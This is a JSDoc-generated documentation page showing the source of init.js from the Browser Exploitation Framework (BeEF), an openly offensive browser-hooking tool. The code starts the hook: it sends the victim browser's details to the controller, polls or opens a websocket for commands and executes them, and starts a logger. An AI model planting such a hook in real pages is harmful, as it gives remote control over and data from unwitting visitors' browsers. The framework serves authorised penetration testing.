142 lines
5.1 KiB
HTML
142 lines
5.1 KiB
HTML
<!DOCTYPE html>
|
|
<html lang="en">
|
|
<head>
|
|
<meta charset="utf-8">
|
|
<title>JSDoc: Source: init.js</title>
|
|
|
|
<script src="scripts/prettify/prettify.js"> </script>
|
|
<script src="scripts/prettify/lang-css.js"> </script>
|
|
<!--[if lt IE 9]>
|
|
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
|
|
<![endif]-->
|
|
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
|
|
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
|
|
</head>
|
|
|
|
<body>
|
|
|
|
<div id="main">
|
|
|
|
<h1 class="page-title">Source: init.js</h1>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<section>
|
|
<article>
|
|
<pre class="prettyprint source linenums"><code>//
|
|
// Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
|
|
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
// See the file 'doc/COPYING' for copying permission
|
|
//
|
|
|
|
/**
|
|
* Contains the beef_init() method which starts the BeEF client-side
|
|
* logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object.
|
|
*
|
|
* If beef.pageIsLoaded is true, then this JS has been loaded >1 times
|
|
* and will have a new session id. The new session id will need to know
|
|
* the brwoser details. So sendback the browser details again.
|
|
*
|
|
* @namespace beef.init
|
|
*/
|
|
|
|
beef.session.get_hook_session_id();
|
|
|
|
if (beef.pageIsLoaded) {
|
|
beef.net.browser_details();
|
|
}
|
|
/**
|
|
* @memberof beef.init
|
|
*/
|
|
window.onload = function () {
|
|
beef_init();
|
|
};
|
|
/**
|
|
* @memberof beef.init
|
|
*/
|
|
window.onpopstate = function (event) {
|
|
if (beef.onpopstate.length > 0) {
|
|
event.preventDefault;
|
|
for (var i = 0; i < beef.onpopstate.length; i++) {
|
|
var callback = beef.onpopstate[i];
|
|
try {
|
|
callback(event);
|
|
} catch (e) {
|
|
beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
|
|
}
|
|
return false;
|
|
}
|
|
}
|
|
};
|
|
/**
|
|
* @memberof beef.init
|
|
*/
|
|
window.onclose = function (event) {
|
|
if (beef.onclose.length > 0) {
|
|
event.preventDefault;
|
|
for (var i = 0; i < beef.onclose.length; i++) {
|
|
var callback = beef.onclose[i];
|
|
try {
|
|
callback(event);
|
|
} catch (e) {
|
|
beef.debug("window.onclose - couldn't execute callback: " + e.message);
|
|
}
|
|
return false;
|
|
}
|
|
}
|
|
};
|
|
|
|
/**
|
|
* Starts the polling mechanism, and initialize various components:
|
|
* - browser details (see browser.js) are sent back to the "/init" handler
|
|
* - the polling starts (checks for new commands, and execute them)
|
|
* - the logger component is initialized (see logger.js)
|
|
* - the Autorun Engine is initialized (see are.js)
|
|
* @memberof beef.init
|
|
*/
|
|
function beef_init() {
|
|
if (!beef.pageIsLoaded) {
|
|
beef.pageIsLoaded = true;
|
|
beef.net.browser_details();
|
|
|
|
if (beef.browser.hasWebSocket() && typeof beef.websocket != 'undefined') {
|
|
setTimeout(function(){
|
|
beef.websocket.start();
|
|
beef.updater.execute_commands();
|
|
beef.logger.start();
|
|
}, parseInt(beef.websocket.ws_connect_timeout));
|
|
}else {
|
|
beef.net.browser_details();
|
|
beef.updater.execute_commands();
|
|
beef.updater.check();
|
|
beef.logger.start();
|
|
}
|
|
}
|
|
}
|
|
</code></pre>
|
|
</article>
|
|
</section>
|
|
|
|
|
|
|
|
|
|
</div>
|
|
|
|
<nav>
|
|
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
|
|
</nav>
|
|
|
|
<br class="clear">
|
|
|
|
<footer>
|
|
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
|
|
</footer>
|
|
|
|
<script> prettyPrint(); </script>
|
|
<script src="scripts/linenumber.js"> </script>
|
|
</body>
|
|
</html>
|